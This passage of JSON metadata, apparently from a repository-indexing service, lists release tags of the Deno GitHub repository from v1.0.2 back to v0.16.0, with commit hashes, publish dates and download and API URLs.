"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/t